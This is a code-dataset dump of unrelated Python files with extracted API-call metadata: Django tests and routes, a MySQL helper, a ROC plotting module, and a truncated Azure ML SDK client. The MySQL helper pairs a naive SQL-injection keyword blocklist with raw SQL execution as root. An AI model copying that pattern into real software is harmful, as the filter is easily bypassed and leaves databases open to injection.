'ValidationError', (['"""user not found."""'], {}), "('user not found.')\n", (3143, 3162), False, 'from utils.exception import ValidationError\n'), ((756, 771), 'utils.validation.is_money', 'is_money', (['value'], {}), '(value)\n', (764, 771), False, 'from utils.validation import is_money\n')] |
import uuid
from django.test import TestCase
from django.shortcuts import resolve_url as r
from eventex.subscriptions.models import Subscription
class SubscriptionDetailGet(TestCase):
def setUp(self):
self.obj = Subscription.objects.create(
name='<NAME>',
cpf='12345678901',
email='<EMAIL>',
phone='938654321'
)
self.response = self.client.get(r('subscriptions:detail', self.obj.uid))
def test_get(self):
self.assertEqual(200, self.response.status_code)
def test_template_used(self):
self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html')
def test_context(self):
subscription = self.response.context['subscription']
self.assertIsInstance(subscription, Subscription)
def test_html(self):
contents = (
self.obj.name,
self.obj.cpf,
self.obj.email,
self.obj.phone
)
for content in contents:
with self.subTest():
self.assertContains(self.response, content)
class SubscriptionDetailNotFound(TestCase):
def setUp(self):
uid = uuid.uuid4()
self.response = self.client.get(r('subscriptions:detail', uid))
def test_not_found(self):
self.assertEqual(404, self.response.status_code) | [
"eventex.subscriptions.models.Subscription.objects.create",
"uuid.uuid4",
"django.shortcuts.resolve_url"
] | [((227, 329), 'eventex.subscriptions.models.Subscription.objects.create', 'Subscription.objects.create', ([], {'name': '"""<NAME>"""', 'cpf': '"""12345678901"""', 'email': '"""<EMAIL>"""', 'phone': '"""938654321"""'}), "(name='<NAME>', cpf='12345678901', email=\n '<EMAIL>', phone='938654321')\n", (254, 329), False, 'from eventex.subscriptions.models import Subscription\n'), ((1189, 1201), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (1199, 1201), False, 'import uuid\n'), ((423, 462), 'django.shortcuts.resolve_url', 'r', (['"""subscriptions:detail"""', 'self.obj.uid'], {}), "('subscriptions:detail', self.obj.uid)\n", (424, 462), True, 'from django.shortcuts import resolve_url as r\n'), ((1242, 1272), 'django.shortcuts.resolve_url', 'r', (['"""subscriptions:detail"""', 'uid'], {}), "('subscriptions:detail', uid)\n", (1243, 1272), True, 'from django.shortcuts import resolve_url as r\n')] |
from django.urls import path
from . import views
urlpatterns = [
path('', views.index),
path('expand', views.expand),
path('upload', views.upload),
path('comment', views.add_comment),
path('public_data', views.get_public_data),
] | [
"django.urls.path"
] | [((70, 91), 'django.urls.path', 'path', (['""""""', 'views.index'], {}), "('', views.index)\n", (74, 91), False, 'from django.urls import path\n'), ((97, 125), 'django.urls.path', 'path', (['"""expand"""', 'views.expand'], {}), "('expand', views.expand)\n", (101, 125), False, 'from django.urls import path\n'), ((131, 159), 'django.urls.path', 'path', (['"""upload"""', 'views.upload'], {}), "('upload', views.upload)\n", (135, 159), False, 'from django.urls import path\n'), ((165, 199), 'django.urls.path', 'path', (['"""comment"""', 'views.add_comment'], {}), "('comment', views.add_comment)\n", (169, 199), False, 'from django.urls import path\n'), ((205, 247), 'django.urls.path', 'path', (['"""public_data"""', 'views.get_public_data'], {}), "('public_data', views.get_public_data)\n", (209, 247), False, 'from django.urls import path\n')] |
import MySQLdb
def antisql(content):
antistr=u"'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|;|or|-|+|,".split(u"|")
for i in range (len(antistr)):
if antistr[i] in content:
return 1
return 0
def sql_select(text):
conn=MySQLdb.connect(host='localhost',user="root",passwd="<PASSWORD>",db="dimcreator",port=3306,charset='utf8')
cur = conn.cursor()
cur.execute(text)
res=cur.fetchall()
cur.close()
conn.commit()
conn.close()
return res
def sql_write(text):
conn=MySQLdb.connect(host='localhost',user="root",passwd="<PASSWORD>",db="dimcreator",port=3306,charset='utf8')
cur = conn.cursor()
cur.execute(text)
cur.close()
conn.commit()
conn.close()
| [
"MySQLdb.connect"
] | [((317, 433), 'MySQLdb.connect', 'MySQLdb.connect', ([], {'host': '"""localhost"""', 'user': '"""root"""', 'passwd': '"""<PASSWORD>"""', 'db': '"""dimcreator"""', 'port': '(3306)', 'charset': '"""utf8"""'}), "(host='localhost', user='root', passwd='<PASSWORD>', db=\n 'dimcreator', port=3306, charset='utf8')\n", (332, 433), False, 'import MySQLdb\n'), ((591, 707), 'MySQLdb.connect', 'MySQLdb.connect', ([], {'host': '"""localhost"""', 'user': '"""root"""', 'passwd': '"""<PASSWORD>"""', 'db': '"""dimcreator"""', 'port': '(3306)', 'charset': '"""utf8"""'}), "(host='localhost', user='root', passwd='<PASSWORD>', db=\n 'dimcreator', port=3306, charset='utf8')\n", (606, 707), False, 'import MySQLdb\n')] |
import os
import shutil
prepath_in='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/EUCLID/EUCLID_GridPlot_'
prepath_out='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/Parsed/EUCLID/EUCLID_GridPlot_'
for idx in range(120):
tidx=idx//10
midx=idx%10
path=prepath_out+str(idx)+'/'
os.mkdir(path)
filename= ('gp_'+str(tidx)+'_'+str(midx)+'.db')
shutil.copyfile(prepath_in+str(idx)+'/'+filename, prepath_out+str(idx)+'/'+filename)
print(path)
# os.rename(prepath_in+str(idx)+'.err', prepath_out+str(idx)+'/EUCLID_GridPlot_56234229_'+str(idx)+'.err')
| [
"os.mkdir"
] | [((351, 365), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (359, 365), False, 'import os\n')] |
# Generated by Django 2.2 on 2019-04-24 03:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='customuser',
name='ward_name',
),
migrations.AddField(
model_name='customuser',
name='shifts_per_roster',
field=models.IntegerField(default=10),
preserve_default=False,
),
]
| [
"django.db.migrations.RemoveField",
"django.db.models.IntegerField"
] | [((220, 285), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""customuser"""', 'name': '"""ward_name"""'}), "(model_name='customuser', name='ward_name')\n", (242, 285), False, 'from django.db import migrations, models\n'), ((444, 475), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(10)'}), '(default=10)\n', (463, 475), False, 'from django.db import migrations, models\n')] |
"""Methods used to build ROC."""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.metrics import roc_curve, auc
# seaborn settings
sns.set_style("white")
sns.set_context("paper")
color_palette = sns.color_palette("colorblind")
sns.set_palette(color_palette)
def _get_total_undirected_interactions(n):
return n * (n - 1) / 2
def _check_index(index, labels_set, interaction_symbol='<->'):
e1, e2 = index.split(interaction_symbol)
return (e1 in labels_set and e2 in labels_set)
def _filter_indices_with_labels(indexes, labels, interaction_symbol='<->'):
labels_set = set(labels)
filtering = pd.Series([
_check_index(index, labels_set, interaction_symbol)
for index in indexes
])
return indexes[filtering]
def _is_index_diagonal(index, interaction_indices='<->'):
a_node, another_node = index.split(interaction_indices)
return a_node == another_node
def _get_evaluation_on_given_labels(
labels, true_interactions, predicted_interactions, no_self_loops=True
):
total_interactions = _get_total_undirected_interactions(len(labels))
interaction_indices = list(
set(
_filter_indices_with_labels(predicted_interactions.index, labels) |
_filter_indices_with_labels(true_interactions.index, labels)
)
)
if no_self_loops:
interaction_indices = [
index
for index in interaction_indices
if not _is_index_diagonal(index)
]
predicted_interactions = predicted_interactions.reindex(
interaction_indices
).fillna(0.0)
true_interactions = true_interactions.reindex(
interaction_indices
).fillna(0.0)
zero_interactions = int(total_interactions) - len(interaction_indices)
y = np.append(true_interactions.values, np.zeros((zero_interactions)))
scores = np.append(
predicted_interactions.values, np.zeros((zero_interactions))
)
return y, scores
def get_roc_df(
pathway_name, method_name, true_interactions, predicted_interactions,
number_of_roc_points=100
):
"""Return dataframe that can be used to plot a ROC curve."""
labels = {
gene
for genes in [
true_interactions.e1, predicted_interactions.e1,
true_interactions.e2, predicted_interactions.e2
]
for gene in genes
}
y, scores = _get_evaluation_on_given_labels(
labels, true_interactions.intensity,
predicted_interactions.intensity
)
# print(method_name, y, scores)
reference_xx = np.linspace(0, 1, number_of_roc_points)
if sum(y) > 0:
xx, yy, threshold = roc_curve(y, scores)
print(method_name, y, scores, threshold, xx, yy)
area_under_curve = auc(xx, yy)
yy = np.interp(reference_xx, xx, yy)
else:
yy = reference_xx
area_under_curve = 0.5 # worst
roc_df = pd.DataFrame({
'pathway': number_of_roc_points * [pathway_name],
'method': (
number_of_roc_points * [method_name]
),
'YY': yy,
'XX': reference_xx.tolist()
})
return roc_df, area_under_curve
def plot_roc_curve_from_df(
df, auc_dict_list=None, output_filepath=None, figsize=(6, 6)
):
"""From a df with multiple methods plot a roc curve using sns.tspot."""
xlabel = 'False Discovery Rate'
ylabel = 'True Positive Rate'
title = 'Receiver Operating Characteristic'
# rename method name to include AUC to show it in legend
if auc_dict_list:
for method in auc_dict_list.keys():
mean_auc = np.mean(auc_dict_list[method])
method_indices = df['method'] == method
df['mean_auc'] = mean_auc
df.loc[method_indices, 'method'] = (
'{} '.format(
method.capitalize()
if method != 'INtERAcT'
else method
) +
'AUC=%0.2f' % mean_auc
)
df = df.sort_values(by='method')
df.rename(columns={'method': ''}, inplace=True) # to avoid legend title
plt.figure(figsize=figsize)
sns.set_style("whitegrid", {'axes.grid': False})
sns.tsplot(
data=df, time='XX', value='YY',
condition='', unit='pathway', legend=True
)
plt.xlim([0, 1])
plt.ylim([0, 1])
plt.xlabel(xlabel)
plt.ylabel(ylabel)
plt.title(title)
if output_filepath:
plt.savefig(output_filepath, bbox_inches='tight')
| [
"matplotlib.pyplot.title",
"seaborn.set_style",
"matplotlib.pyplot.xlim",
"sklearn.metrics.roc_curve",
"matplotlib.pyplot.ylim",
"seaborn.tsplot",
"numpy.zeros",
"sklearn.metrics.auc",
"matplotlib.pyplot.figure",
"numpy.mean",
"numpy.linspace",
"seaborn.color_palette",
"numpy.interp",
"matplotlib.pyplot.ylabel",
"seaborn.set_palette",
"matplotlib.pyplot.xlabel",
"seaborn.set_context",
"matplotlib.pyplot.savefig"
] | [((190, 212), 'seaborn.set_style', 'sns.set_style', (['"""white"""'], {}), "('white')\n", (203, 212), True, 'import seaborn as sns\n'), ((213, 237), 'seaborn.set_context', 'sns.set_context', (['"""paper"""'], {}), "('paper')\n", (228, 237), True, 'import seaborn as sns\n'), ((254, 285), 'seaborn.color_palette', 'sns.color_palette', (['"""colorblind"""'], {}), "('colorblind')\n", (271, 285), True, 'import seaborn as sns\n'), ((286, 316), 'seaborn.set_palette', 'sns.set_palette', (['color_palette'], {}), '(color_palette)\n', (301, 316), True, 'import seaborn as sns\n'), ((2613, 2652), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', 'number_of_roc_points'], {}), '(0, 1, number_of_roc_points)\n', (2624, 2652), True, 'import numpy as np\n'), ((4156, 4183), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': 'figsize'}), '(figsize=figsize)\n', (4166, 4183), True, 'import matplotlib.pyplot as plt\n'), ((4188, 4236), 'seaborn.set_style', 'sns.set_style', (['"""whitegrid"""', "{'axes.grid': False}"], {}), "('whitegrid', {'axes.grid': False})\n", (4201, 4236), True, 'import seaborn as sns\n'), ((4241, 4330), 'seaborn.tsplot', 'sns.tsplot', ([], {'data': 'df', 'time': '"""XX"""', 'value': '"""YY"""', 'condition': '""""""', 'unit': '"""pathway"""', 'legend': '(True)'}), "(data=df, time='XX', value='YY', condition='', unit='pathway',\n legend=True)\n", (4251, 4330), True, 'import seaborn as sns\n'), ((4353, 4369), 'matplotlib.pyplot.xlim', 'plt.xlim', (['[0, 1]'], {}), '([0, 1])\n', (4361, 4369), True, 'import matplotlib.pyplot as plt\n'), ((4374, 4390), 'matplotlib.pyplot.ylim', 'plt.ylim', (['[0, 1]'], {}), '([0, 1])\n', (4382, 4390), True, 'import matplotlib.pyplot as plt\n'), ((4395, 4413), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['xlabel'], {}), '(xlabel)\n', (4405, 4413), True, 'import matplotlib.pyplot as plt\n'), ((4418, 4436), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['ylabel'], {}), '(ylabel)\n', (4428, 4436), True, 'import matplotlib.pyplot as plt\n'), ((4441, 4457), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (4450, 4457), True, 'import matplotlib.pyplot as plt\n'), ((1863, 1890), 'numpy.zeros', 'np.zeros', (['zero_interactions'], {}), '(zero_interactions)\n', (1871, 1890), True, 'import numpy as np\n'), ((1957, 1984), 'numpy.zeros', 'np.zeros', (['zero_interactions'], {}), '(zero_interactions)\n', (1965, 1984), True, 'import numpy as np\n'), ((2700, 2720), 'sklearn.metrics.roc_curve', 'roc_curve', (['y', 'scores'], {}), '(y, scores)\n', (2709, 2720), False, 'from sklearn.metrics import roc_curve, auc\n'), ((2805, 2816), 'sklearn.metrics.auc', 'auc', (['xx', 'yy'], {}), '(xx, yy)\n', (2808, 2816), False, 'from sklearn.metrics import roc_curve, auc\n'), ((2830, 2861), 'numpy.interp', 'np.interp', (['reference_xx', 'xx', 'yy'], {}), '(reference_xx, xx, yy)\n', (2839, 2861), True, 'import numpy as np\n'), ((4491, 4540), 'matplotlib.pyplot.savefig', 'plt.savefig', (['output_filepath'], {'bbox_inches': '"""tight"""'}), "(output_filepath, bbox_inches='tight')\n", (4502, 4540), True, 'import matplotlib.pyplot as plt\n'), ((3644, 3674), 'numpy.mean', 'np.mean', (['auc_dict_list[method]'], {}), '(auc_dict_list[method])\n', (3651, 3674), True, 'import numpy as np\n')] |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional, TYPE_CHECKING
from azure.mgmt.core import AsyncARMPipelineClient
from azure.profiles import KnownProfiles, ProfileDefinition
from azure.profiles.multiapiclient import MultiApiClientMixin
from msrest import Deserializer, Serializer
from ._configuration import AzureMachineLearningWorkspacesConfiguration
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials import TokenCredential
from azure.core.credentials_async import AsyncTokenCredential
class _SDKClient(object):
def __init__(self, *args, **kwargs):
"""This is a fake class to support current implemetation of MultiApiClientMixin."
Will be removed in final version of multiapi azure-core based client
"""
pass
class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient):
"""These APIs allow end users to operate on Azure Machine Learning Workspace resources.
This ready contains multiple API versions, to help you deal with all of the Azure clouds
(Azure Stack, Azure Government, Azure China, etc.).
By default, it uses the latest API version available on public Azure.
For production, you should stick to a particular api-version and/or profile.
The profile sets a mapping between an operation group and its API version.
The api-version parameter sets the default API version if the operation
group is not described in the profile.
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: The ID of the target subscription.
:type subscription_id: str
:param api_version: API version to use if no profile is provided, or if missing in profile.
:type api_version: str
:param base_url: Service URL
:type base_url: str
:param profile: A profile definition, from KnownProfiles to dict.
:type profile: azure.profiles.KnownProfiles
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
"""
DEFAULT_API_VERSION = '2022-05-01'
_PROFILE_TAG = "azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces"
LATEST_PROFILE = ProfileDefinition({
_PROFILE_TAG: {
None: DEFAULT_API_VERSION,
'assets': '1.0.0',
'async_operations': 'v1.0',
'batch_job_deployment': '2020-09-01-dataplanepreview',
'batch_job_endpoint': '2020-09-01-dataplanepreview',
'data_call': '1.5.0',
'data_container': '1.5.0',
'data_version': '1.5.0',
'dataset_containers': '2021-10-01',
'dataset_controller_v2': '1.5.0',
'dataset_v2': '1.5.0',
'dataset_versions': '2021-10-01',
'datasets_v1': '1.5.0',
'delete': 'v1.0',
'events': 'v1.0',
'experiments': 'v1.0',
'extensive_model': '1.0.0',
'get_operation_status': '1.5.0',
'metric': 'v1.0',
'migration': '1.0.0',
'models': '1.0.0',
'registry_management_non_workspace': 'v1.0',
'run': 'v1.0',
'run_artifacts': 'v1.0',
'runs': 'v1.0',
'spans': 'v1.0',
'temporary_data_references': '2021-10-01-dataplanepreview',
}},
_PROFILE_TAG + " latest"
)
def __init__(
self,
credential: "AsyncTokenCredential",
subscription_id: str,
api_version: Optional[str] = None,
base_url: str = "https://management.azure.com",
profile: KnownProfiles = KnownProfiles.default,
**kwargs # type: Any
) -> None:
self._config = AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
super(AzureMachineLearningWorkspaces, self).__init__(
api_version=api_version,
profile=profile
)
@classmethod
def _models_dict(cls, api_version):
return {k: v for k, v in cls.models(api_version).__dict__.items() if isinstance(v, type)}
@classmethod
def models(cls, api_version=DEFAULT_API_VERSION):
"""Module depends on the API version:
* 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>`
* 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>`
* v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>`
* v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>`
* 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>`
* 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>`
* 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>`
* 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>`
* 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>`
* 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>`
"""
if api_version == '1.5.0':
from ..dataset_dataplane import models
return models
elif api_version == '1.0.0':
from ..model_dataplane import models
return models
elif api_version == 'v1.0':
from ..registry_discovery import models
return models
elif api_version == 'v1.0':
from ..runhistory import models
return models
elif api_version == '2020-09-01-dataplanepreview':
from ..v2020_09_01_dataplanepreview import models
return models
elif api_version == '2021-10-01':
from ..v2021_10_01 import models
return models
elif api_version == '2021-10-01-dataplanepreview':
from ..v2021_10_01_dataplanepreview import models
return models
elif api_version == '2022-01-01-preview':
from ..v2022_01_01_preview import models
return models
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview import models
return models
elif api_version == '2022-05-01':
from ..v2022_05_01 import models
return models
raise ValueError("API version {} is not available".format(api_version))
@property
def assets(self):
"""Instance depends on the API version:
* 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>`
"""
api_version = self._get_api_version('assets')
if api_version == '1.0.0':
from ..model_dataplane.aio.operations import AssetsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'assets'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def async_operations(self):
"""Instance depends on the API version:
* v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>`
"""
api_version = self._get_api_version('async_operations')
if api_version == 'v1.0':
from ..registry_discovery.aio.operations import AsyncOperationsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'async_operations'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def batch_deployments(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>`
* 2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>`
* 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>`
"""
api_version = self._get_api_version('batch_deployments')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import BatchDeploymentsOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import BatchDeploymentsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'batch_deployments'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def batch_endpoints(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>`
* 2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>`
* 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>`
"""
api_version = self._get_api_version('batch_endpoints')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import BatchEndpointsOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import BatchEndpointsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import BatchEndpointsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'batch_endpoints'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def batch_job_deployment(self):
"""Instance depends on the API version:
* 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>`
"""
api_version = self._get_api_version('batch_job_deployment')
if api_version == '2020-09-01-dataplanepreview':
from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'batch_job_deployment'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def batch_job_endpoint(self):
"""Instance depends on the API version:
* 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>`
"""
api_version = self._get_api_version('batch_job_endpoint')
if api_version == '2020-09-01-dataplanepreview':
from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'batch_job_endpoint'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def code_containers(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>`
* 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>`
* 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>`
* 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>`
"""
api_version = self._get_api_version('code_containers')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import CodeContainersOperations as OperationClass
elif api_version == '2021-10-01-dataplanepreview':
from ..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import CodeContainersOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import CodeContainersOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'code_containers'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def code_versions(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>`
* 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>`
* 2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>`
* 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>`
"""
api_version = self._get_api_version('code_versions')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import CodeVersionsOperations as OperationClass
elif api_version == '2021-10-01-dataplanepreview':
from ..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import CodeVersionsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import CodeVersionsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'code_versions'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def component_containers(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>`
* 2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>`
* 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>`
* 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>`
"""
api_version = self._get_api_version('component_containers')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import ComponentContainersOperations as OperationClass
elif api_version == '2021-10-01-dataplanepreview':
from ..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import ComponentContainersOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import ComponentContainersOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'component_containers'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def component_versions(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>`
* 2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>`
* 2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>`
* 2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>`
"""
api_version = self._get_api_version('component_versions')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import ComponentVersionsOperations as OperationClass
elif api_version == '2021-10-01-dataplanepreview':
from ..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import ComponentVersionsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import ComponentVersionsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'component_versions'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def compute(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>`
* 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>`
* 2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>`
"""
api_version = self._get_api_version('compute')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import ComputeOperations as OperationClass
elif api_version == '2022-01-01-preview':
from ..v2022_01_01_preview.aio.operations import ComputeOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import ComputeOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'compute'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def data_call(self):
"""Instance depends on the API version:
* 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>`
"""
api_version = self._get_api_version('data_call')
if api_version == '1.5.0':
from ..dataset_dataplane.aio.operations import DataCallOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'data_call'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def data_container(self):
"""Instance depends on the API version:
* 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>`
"""
api_version = self._get_api_version('data_container')
if api_version == '1.5.0':
